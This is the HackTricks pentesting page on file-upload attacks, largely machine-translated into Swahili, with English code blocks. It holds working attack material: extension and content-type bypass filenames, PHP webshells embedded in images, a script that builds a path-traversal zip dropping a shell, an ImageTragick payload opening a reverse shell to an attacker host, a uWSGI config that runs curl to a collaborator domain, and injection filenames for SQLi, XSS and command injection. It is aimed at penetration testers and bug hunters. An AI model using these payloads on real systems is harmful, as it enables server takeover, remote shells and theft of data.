hacktricks/pentesting-web/file-upload/README.md

# File Upload

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackiwa - **tunatafuta wafanyakazi!** (_kuandika na kuzungumza kwa ufasaha kwa Kiholanzi kunahitajika_).

{% embed url="https://www.stmcyber.com/careers" %}

## File Upload General Methodology

Extensions nyingine muhimu:

* **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._phps_, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
* **Kazi katika PHPv8**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_
* **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
* **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
* **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
* **Flash**: _.swf_
* **Perl**: _.pl, .cgi_
* **Erlang Yaws Web Server**: _.yaws_

### Bypass file extensions checks

1. Ikiwa zinatumika, **angalia** **extensions za awali.** Pia jaribu kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions za awali pia):_
* _file.png.php_
* _file.png.Php5_
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp ku **bruteforce** herufi zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa **awali**_)
* _file.php%20_
* _file.php%0a_
* _file.php%00_
* _file.php%0d%0a_
* _file.php/_
* _file.php.\\_
* _file._
* _file.php...._
* _file.pHp5...._
4. Jaribu kupita ulinzi **kwa kudanganya parser ya extension** ya upande wa seva kwa mbinu kama **kuongeza** **extension** au **kuongeza data za junk** (**null** bytes) kati ya extensions. _Unaweza pia kutumia **extensions za awali** kuandaa payload bora._
* _file.png.php_
* _file.png.pHp5_
* _file.php#.png_
* _file.php%00.png_
* _file.php\x00.png_
* _file.php%0a.png_
* _file.php%0d%0a.png_
* _file.phpJunk123png_
5. Ongeza **tabaka lingine la extensions** kwa ukaguzi wa awali:
* _file.png.jpg.php_
* _file.php%00.png%00.jpg_
6. Jaribu kuweka **exec extension kabla ya extension halali** na uombe ili seva iwe na mipangilio isiyo sahihi. (inayofaa kutumia katika makosa ya mipangilio ya Apache ambapo chochote chenye extension\*\* _**.php**_**, lakini** si lazima kumalizika na .php\*\* itatekeleza msimbo):
* _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi ya colon “:” itaingizwa baada ya extension iliyokatazwa na kabla ya ile inayoruhusiwa. Kama matokeo, **faili tupu yenye extension iliyokatazwa** itaundwa kwenye seva (mfano “file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia jina lake fupi. Mwelekeo wa “**::$data**” unaweza pia kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza herufi ya dot baada ya mwelekeo huu pia inaweza kuwa na manufaa kupita vizuizi zaidi (.e.g. “file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP mbaya inabaki. AAA<--SNIP-->AAA.php

```
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ab6Ab7Ab8Ab9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png
```

### Bypass Content-Type, Magic Number, Compression & Resizing

* Pita **Content-Type** ukaguzi kwa kuweka **thamani** ya **header** ya **Content-Type** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Orodha ya **Content-Type**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
* Pita **magic number** ukaguzi kwa kuongeza mwanzoni mwa faili **bytes za picha halisi** (changanya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au unaweza pia **kuingiza payload moja kwa moja** katika picha:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
* Ikiwa **compression inaongezwa kwenye picha yako**, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu za awali hazitakuwa na manufaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**mbinu iliyofafanuliwa hapa**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandiko ambayo yatadumu hata baada ya compression.
* [**Github na msimbo**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_plte\_png.php)
* Tovuti inaweza pia kuwa **ikiweka** **picha**, kwa kutumia kwa mfano kazi za PHP-GD `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**mbinu iliyofafanuliwa hapa**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandiko ambayo yatadumu hata baada ya compression.
* [**Github na msimbo**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_idat\_png.php)
* Mbinu nyingine ya kutengeneza payload ambayo **inadumu baada ya kupunguza picha**, kwa kutumia kazi ya PHP-GD `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**mbinu iliyofafanuliwa hapa**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandiko ambayo yatadumu hata baada ya compression.
* [**Github na msimbo**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)

### Other Tricks to check

* Tafuta udhaifu wa **kubadilisha** jina la faili iliyopakiwa tayari (kubadilisha extension).
* Tafuta udhaifu wa **Local File Inclusion** kutekeleza backdoor.
* **Kuweza Kutoa Taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) faili **ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **faili** au **folder** ambayo **tayari ipo**
3. Kupakia faili yenye **“.”, “..”, au “…” kama jina lake**. Kwa mfano, katika Apache katika **Windows**, ikiwa programu inaokoa faili zilizopakiwa katika saraka “/www/uploads/”, jina la “.” litaunda faili inayoitwa “uploads” katika saraka “/www/”.
4. Pakia faili ambayo huenda isiweze kufutwa kwa urahisi kama **“…:.jpg”** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **herufi zisizo sahihi** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** kwa kutumia **majina yaliyohifadhiwa** (**yaliyokatazwa**) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
* Jaribu pia **kupakia executable** (.exe) au **.html** (isiyo na mashaka) ambayo **itaendesha msimbo** wakati itakapofunguliwa kwa bahati mbaya na mwathirika.

### Special extension tricks

Ikiwa unajaribu kupakia faili kwenye **seva ya PHP**, [angalia hila ya **.htaccess** kutekeleza msimbo](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
Ikiwa unajaribu kupakia faili kwenye **seva ya ASP**, [angalia hila ya **.config** kutekeleza msimbo](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).

Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza **kutumika kama faili ya php** (kuitekeleza kwa php, au kuijumuisha ndani ya script...)

Extension ya `.inc` wakati mwingine hutumiwa kwa faili za php ambazo zinatumika tu **kuagiza faili**, hivyo, kwa wakati fulani, mtu anaweza kuwa amekubali **extension hii kutekelezwa**.

## **Jetty RCE**

Ikiwa unaweza kupakia faili ya XML kwenye seva ya Jetty unaweza kupata [RCE kwa sababu **xml mpya \*.xml na \*.war zinashughulikiwa moja kwa moja**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Hivyo, kama ilivyotajwa katika picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na subiri shell!

![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1047).png>)

## **uWSGI RCE**

Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).

Udhaifu wa Remote Command Execution (RCE) unaweza kutumiwa katika seva za uWSGI ikiwa mtu ana uwezo wa kubadilisha faili ya mipangilio ya `.ini`. Faili za mipangilio za uWSGI zinatumia sintaksia maalum kuingiza "michanganyiko" ya mabadiliko, nafasi, na waendeshaji. Kwa hakika, waendeshaji '@', wanaotumika kama `@(filename)`, wameundwa kuingiza maudhui ya faili. Kati ya mipango mbalimbali inayoungwa mkono katika uWSGI, mpango wa "exec" ni wenye nguvu, ukiruhusu kusoma data kutoka kwa pato la kawaida la mchakato. Kipengele hiki kinaweza kudanganywa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya mipangilio ya `.ini` inashughulikiwa.

Fikiria mfano ufuatao wa faili hatari ya `uwsgi.ini`, ikionyesha mipango mbalimbali:
```ini
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.

Ni muhimu kuelewa tabia ya kulegeza ya uchambuzi wa faili ya usanidi ya uWSGI. Kwa haswa, payload iliyozungumziwa inaweza kuingizwa kwenye faili ya binary (kama picha au PDF), ikipanua zaidi wigo wa uwezekano wa unyakuzi.

## **wget File Upload/SSRF Trick**

Katika baadhi ya matukio unaweza kupata kwamba seva inatumia **`wget`** ili **kupakua faili** na unaweza **kuashiria** **URL**. Katika matukio haya, msimbo unaweza kuwa unakagua kwamba kiambatisho cha faili zilizopakuliwa kiko ndani ya orodha ya ruhusa ili kuhakikisha kwamba faili tu zilizoruhusiwa zitapakuliwa. Hata hivyo, **ukaguzi huu unaweza kupuuziliwa mbali.**\
Urefu **wa juu** wa **jina la faili** katika **linux** ni **255**, hata hivyo, **wget** inakata majina ya faili hadi **236** herufi. Unaweza **kupakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili litakuwa **bypass** **ukaguzi** (kama katika mfano huu **".gif"** ni kiambatisho **halali**) lakini `wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
```

```bash
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
```
Note that **chaguo kingine** unachoweza kufikiria ili kupita ukaguzi huu ni kufanya **seva ya HTTP irejeleze kwenye faili tofauti**, hivyo URL ya awali itapita ukaguzi na kisha wget itashusha faili iliyoelekezwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumika na **parameta** `--trust-server-names` kwa sababu **wget itashusha ukurasa ulioelekezwa kwa jina la faili lililoonyeshwa kwenye URL ya awali**.

## Zana

* [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kupima mifumo ya kupakia faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia udhaifu, kuhakikisha tathmini kamili za programu za wavuti.

## Kutoka kwa Upakiaji wa Faili hadi Udhaifu Mwingine

* Weka **jina la faili** kuwa `../../../tmp/lol.png` na jaribu kufikia **path traversal**
* Weka **jina la faili** kuwa `sleep(10)-- -.jpg` na huenda ukawa na uwezo wa kufikia **SQL injection**
* Weka **jina la faili** kuwa `<svg onload=alert(document.domain)>` ili kufikia XSS
* Weka **jina la faili** kuwa `; sleep 10;` ili kupima baadhi ya injection ya amri (zaidi ya [mbinu za injection za amri hapa](../command-injection.md))
* [**XSS** katika picha (svg) ya kupakia faili](../xss-cross-site-scripting/#xss-uploading-files-svg)
* **JS** faili **kupakia** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
* [**XXE katika kupakia svg**](../xxe-xee-xml-external-entity.md#svg-file-upload)
* [**Open Redirect** kupitia kupakia faili la svg](../open-redirect.md#open-redirect-uploading-svg-files)
* Jaribu **payloads tofauti za svg** kutoka [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*
* [Udhaifu maarufu wa **ImageTrick**](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
* Ikiwa unaweza **kuonyesha seva ya wavuti kukamata picha kutoka URL** unaweza kujaribu kutumia [SSRF](../ssrf-server-side-request-forgery/). Ikiwa **picha** hii itahifadhiwa kwenye tovuti **ya umma**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mtembezi**.
* [**XXE na CORS** bypass na PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
* PDFs zilizoundwa kwa makini kwa XSS: [ukurasa ufuatao unaonyesha jinsi ya **kuingiza data za PDF ili kupata utekelezaji wa JS**](../xss-cross-site-scripting/pdf-injection.md). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF ambayo itatekeleza JS isiyo na mipaka kufuatia maelekezo yaliyotolewa.
* Pakia maudhui ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia ikiwa seva ina **antivirus**
* Angalia ikiwa kuna **kikomo cha ukubwa** katika kupakia faili

Hapa kuna orodha ya juu 10 ya mambo ambayo unaweza kufikia kwa kupakia (kutoka [hapa](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):

1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
3. **GIF**: Stored XSS / SSRF
4. **CSV**: CSV injection
5. **XML**: XXE
6. **AVI**: LFI / SSRF
7. **HTML / JS** : HTML injection / XSS / Open redirect
8. **PNG / JPEG**: Pixel flood attack (DoS)
9. **ZIP**: RCE kupitia LFI / DoS
10. **PDF / PPTX**: SSRF / BLIND XXE

#### Burp Extension

{% embed url="https://github.com/portswigger/upload-scanner" %}

## Magic Header Bytes

* **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
* **JPG**: `"\xff\xd8\xff"`

Rejelea [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) kwa aina nyingine za faili.

### Zip/Tar Faili Zilizopakiwa Zitaondolewa Kiotomatiki

Ikiwa unaweza kupakia ZIP ambayo itakuaondolewa ndani ya seva, unaweza kufanya mambo 2:

#### Symlink

Pakia kiungo kinachojumuisha viungo laini kwa faili nyingine, kisha, ukifika kwenye faili zilizondolewa utapata faili zilizounganishwa:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress in different folders

Uundaji wa faili zisizotarajiwa katika saraka wakati wa uundaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za kiwango cha OS kupitia upakuaji wa faili zenye uharibifu, msaada wa uhamasishaji wa kihierarkia na uwezo wa kupita kwenye saraka wa muundo wa ZIP unaweza kutumika. Hii inawawezesha washambuliaji kupita vizuizi na kutoroka saraka salama za upakuaji kwa kubadilisha kazi ya uundaji ya programu inayolengwa.

Kibao cha kiotomatiki cha kutengeneza faili kama hizo kinapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Chombo hiki kinaweza kutumika kama inavyoonyeshwa:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa katika mfumo wako. Hii inahakikisha kwamba evilarc haikabiliwi na makosa wakati wa operesheni yake.

Hapa chini kuna mfano wa msimbo wa Python unaotumika kuunda faili la zip la uhalifu:
```python
#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()
```
**Kukandamiza ushirikishaji kwa ajili ya kueneza faili**

Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)

1.  **Kuunda PHP Shell**: Msimbo wa PHP umeandikwa ili kutekeleza amri zinazopitishwa kupitia mabadiliko ya `$_REQUEST`.

```php
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
```
2.  **Kueneza Faili na Kuunda Faili Zilizoshinikizwa**: Faili nyingi zinaandaliwa na archive ya zip inakusanywa ikijumuisha faili hizi.

```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3.  **Mabadiliko kwa kutumia Hex Editor au vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au mhariri wa hex, kubadilisha "xxA" kuwa "../" ili kupita kwenye saraka.

```bash
:set modifiable
:%s/xxA/..\//g
:x!
```

## ImageTragic

Pakia maudhui haya yenye kiambatisho cha picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (fanya kutoka [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuunganisha PHP Shell kwenye PNG

Kuunganisha PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi operesheni fulani za usindikaji wa picha. Kazi za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD ni muhimu katika muktadha huu, kwani hutumiwa mara nyingi kwa ajili ya kubadilisha ukubwa na kusampuli picha, mtawalia. Uwezo wa PHP shell iliyounganishwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.

Uchunguzi wa kina wa mbinu hii, ikiwa ni pamoja na mbinu zake na matumizi yake yanayoweza, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake.

Maelezo zaidi katika: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)

## Faili za Polyglot

Faili za polyglot hutumikia kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons ambazo zinaweza kuwepo kwa halali katika muundo wa faili mbalimbali kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mchanganyiko unaofanya kazi kama GIF na archive ya RAR. Faili kama hizi hazijazuiliwa kwa mchanganyiko huu; mchanganyiko kama GIF na JS au PPT na JS pia yanaweza.

Faida kuu ya faili za polyglot inategemea uwezo wao wa kupita hatua za usalama ambazo zinachuja faili kulingana na aina. Utaratibu wa kawaida katika programu mbalimbali unajumuisha kuruhusu aina fulani tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayoweza kutokana na muundo hatari (k.m., JS, PHP, au faili za Phar). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo wa aina nyingi za faili, inaweza kupita kwa siri vizuizi hivi.

Licha ya uwezo wao wa kubadilika, polyglots wanakutana na vikwazo. Kwa mfano, wakati polyglot inaweza kuwa na faili ya PHAR (PHp ARchive) na JPEG kwa wakati mmoja, mafanikio ya kupakia kwake yanaweza kutegemea sera za upanuzi wa faili za jukwaa. Ikiwa mfumo unakuwa mkali kuhusu upanuzi unaoruhusiwa, muundo wa polyglot peke yake huenda usitoshe kuhakikisha kupakia kwake.

Maelezo zaidi katika: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)

## Marejeleo

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).

{% embed url="https://www.stmcyber.com/careers" %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}